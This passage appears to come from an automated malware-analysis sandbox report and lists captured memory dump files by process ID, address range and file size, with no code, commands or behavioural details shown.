                                                            • memory/4976-192-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-187-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-162-0x0000000140000000-0x00000001412A5000-memory.dmp
                                                              Filesize

                                                              18.6MB

                                                            • memory/4976-183-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-182-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-179-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-178-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-175-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-172-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-167-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-165-0x00007FF84D930000-0x00007FF84DAD1000-memory.dmp
                                                              Filesize

                                                              1.6MB

                                                            • memory/4976-379-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4976-164-0x00007FF84CE50000-0x00007FF84CF0E000-memory.dmp
                                                              Filesize

                                                              760KB

                                                            • memory/4976-163-0x00007FF84E850000-0x00007FF84EA45000-memory.dmp
                                                              Filesize

                                                              2.0MB

                                                            • memory/4992-232-0x0000000000000000-mapping.dmp
                                                            • memory/5004-364-0x0000000000000000-mapping.dmp
                                                            • memory/5040-253-0x0000000000000000-mapping.dmp
                                                            • memory/5128-397-0x0000000000000000-mapping.dmp
                                                            • memory/5352-406-0x0000000000000000-mapping.dmp
                                                            • memory/5884-484-0x0000000000000000-mapping.dmp